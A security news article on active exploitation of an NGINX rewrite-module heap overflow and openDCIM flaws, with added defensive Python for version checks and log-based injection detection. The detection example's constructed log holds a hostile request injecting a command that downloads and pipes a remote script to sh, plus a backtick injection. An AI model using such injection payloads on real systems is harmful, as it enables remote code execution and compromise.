
According to VulnCheck, a newly disclosed security flaw affecting NGINX Plus and NGINX Open Source has come under exploitation in the wild just days after its publication.
The vulnerability, tracked as CVE-2026-42945 (CVSS score: 9.2), is a heap buffer overflow in ngx_http_rewrite_module that affects NGINX versions 0.6.27 through 1.30.0. According to AI-native security firm DepthFirst, the vulnerability was introduced in 2008.
Successful exploitation of this flaw could allow an unauthenticated attacker to crash the worker process or potentially execute code remotely via a crafted HTTP request. Note, however, that code execution is only considered feasible on systems where Address Space Layout Randomization (ASLR), a defense against memory-corruption exploits, is disabled.
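As an added example (not from the article, VulnCheck or the NGINX project), the following Python snippet turns the affected range stated above into a quick inventory check: it parses the version string from `nginx -v` output or a `Server` header and reports whether it falls inside 0.6.27 through 1.30.0 inclusive. The sample banners are constructed. The fixed release numbers are not given on this page, so the check only says whether a build is inside the published affected range; it does not prove a fix is absent.

```python
import re

# Affected range as stated in the article (inclusive bounds).
# Assumption: anything outside this range is treated as not affected;
# the article does not name the fixed releases.
AFFECTED_MIN = (0, 6, 27)
AFFECTED_MAX = (1, 30, 0)

# Matches "nginx/1.24.0" inside `nginx -v` output or a Server header.
_VERSION_RE = re.compile(r"nginx/(\d+)\.(\d+)\.(\d+)")


def parse_nginx_version(banner: str):
    """Return (major, minor, patch) or None if no nginx/x.y.z is present.

    `server_tokens off;` yields a bare "Server: nginx" header, which
    deliberately parses to None rather than a guessed version.
    """
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def in_affected_range(version) -> bool:
    """Tuple comparison handles 1.9.x < 1.10.x correctly (string compare would not)."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def assess(banner: str) -> str:
    """Classify a banner as 'affected-range', 'outside-range' or 'unknown'."""
    version = parse_nginx_version(banner)
    if version is None:
        return "unknown"
    return "affected-range" if in_affected_range(version) else "outside-range"


if __name__ == "__main__":
    # Constructed sample inputs (not captured from real hosts).
    samples = [
        "nginx version: nginx/1.24.0",   # typical `nginx -v` output (printed on stderr)
        "Server: nginx/1.30.0",          # upper bound, still affected
        "Server: nginx",                 # server_tokens off: cannot tell
        "nginx version: nginx/0.6.26",   # one patch level before the range
    ]
    for s in samples:
        print(f"{s!r:40} -> {assess(s)}")
```

Two caveats when using this: `nginx -v` writes its banner to stderr, so capture that stream, and distribution packages (AlmaLinux, Debian and others) often backport fixes without bumping the upstream version string, so a version inside the range is a prompt to check the package changelog, not a confirmed unpatched host. The article also notes that the bug is only reachable with a particular rewrite configuration, which this check does not inspect.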
“This vulnerability relies on a specific NGINX configuration, which an attacker could learn or discover and exploit,” said security researcher Kevin Beaumont. “To reach RCE [remote code execution] ASLR must also be disabled on the box.”
In a similar review, an AlmaLinux maintainer said: “Turning a heap overflow into reliable code execution is not trivial with default settings, and we do not expect that systems with ASLR enabled (the default in all supported AlmaLinux releases) will make it easy to create a generic and reliable exploit.”
“However, ‘not easy’ does not mean ‘impossible’. Worker crash DoS is exploitable enough on its own, so we recommend treating this as an emergency,” the maintainer added.
VulnCheck’s latest findings show that attackers are starting to weaponize the flaw: the company is detecting exploitation attempts against its honeypot networks. The nature and ultimate goal of the campaign are currently unknown. Users are advised to apply the fixes released by F5 to protect their deployments from active threats.
Flaws in openDCIM are also being exploited
This development comes after VulnCheck revealed an exploit campaign targeting two critical flaws in openDCIM, an open source application used for data center infrastructure management. Both vulnerabilities are rated 9.3 on the CVSS scoring system and are listed below.
CVE-2026-28515 – Insufficient authentication vulnerability that could allow authenticated users to reach LDAP configuration functions regardless of their assigned privileges. In Docker deployments where REMOTE_USER is set without enforcing authentication, the endpoint can be reached without credentials, allowing unauthorized changes to the application configuration.
CVE-2026-28517 – Operating system command injection vulnerability in the “report_network_map.php” component. The component takes a parameter called “dot” and passes it, unsanitized, directly into a shell command, resulting in arbitrary code execution.
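As an added example (not code from the article, VulnCheck or openDCIM), the Python below shows the detection logic a defender can run over web server access logs for CVE-2026-28517: it isolates requests to report_network_map.php, decodes the “dot” parameter, and flags values containing shell metacharacters that would let the value break out of the command the page describes. The log lines are constructed, the request method is assumed to be GET (the article does not state it), and the query string is split by hand so that a “;” inside the injected value is kept as data rather than treated as a parameter separator.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined-log style (not real traffic).
# Lines 2 and 3 carry injected shell syntax in the "dot" parameter; line 1 is
# a benign value and line 4 is an unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2026:10:00:01 +0000] "GET /report_network_map.php?dot=dot HTTP/1.1" 200 512
203.0.113.7 - - [01/Apr/2026:10:00:02 +0000] "GET /report_network_map.php?dot=dot;curl%20http://198.51.100.9/x.sh|sh HTTP/1.1" 200 88
203.0.113.7 - - [01/Apr/2026:10:00:03 +0000] "GET /report_network_map.php?dot=%60id%60 HTTP/1.1" 200 88
203.0.113.9 - - [01/Apr/2026:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# Endpoint and parameter named in the advisory summary above.
TARGET_SCRIPT = "report_network_map.php"
PARAM = "dot"

# Common/combined log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Characters that terminate or chain a shell word: command separators,
# pipes, command substitution, redirection, subshells, escapes, newlines.
SHELL_META = re.compile(r"[;&|`$<>()\n\\]")


def query_params(target: str) -> dict:
    """Parse the query string of a request target into {name: [values]}.

    Splitting on '&' ourselves (instead of urllib.parse.parse_qs) guarantees
    that ';' is preserved inside values regardless of the Python version.
    """
    params = {}
    query = target.partition("?")[2]
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def find_injection_attempts(log_text: str) -> list:
    """Return one record per request whose decoded 'dot' value carries shell syntax."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line; skip rather than guess
        target = m.group("target")
        path = target.partition("?")[0]
        if path.rsplit("/", 1)[-1] != TARGET_SCRIPT:
            continue
        for value in query_params(target).get(PARAM, []):
            if SHELL_META.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    PARAM: value,
                })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} dot={hit[PARAM]!r}")
```

The metacharacter list errs on the side of noise: a legitimate value containing “(” will be flagged, which is acceptable for an endpoint that should rarely be called. The check only sees what the access log records, so parameters sent in a POST body are invisible to it; if the application accepts the parameter that way, a web application firewall or reverse-proxy request log that captures bodies is needed. A 200 status on a flagged request is worth treating as a likely successful execution rather than a blocked probe.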
These two vulnerabilities were discovered by VulnCheck security researcher Valentin Lobstein in February 2026, alongside the openDCIM SQL injection vulnerability CVE-2026-28516 (CVSS score: 9.3). According to Lobstein, the three flaws could be chained together to execute remote code in five HTTP requests and generate a reverse shell.
Caitlin Condon, vice president of security research at VulnCheck, said: “The cluster of threat actors we’ve observed so far originates from a single Chinese IP, using what appears to be a customized implementation of the AI vulnerability discovery tool Vulnhuntr to automatically check for vulnerable installations before dropping a PHP web shell.”
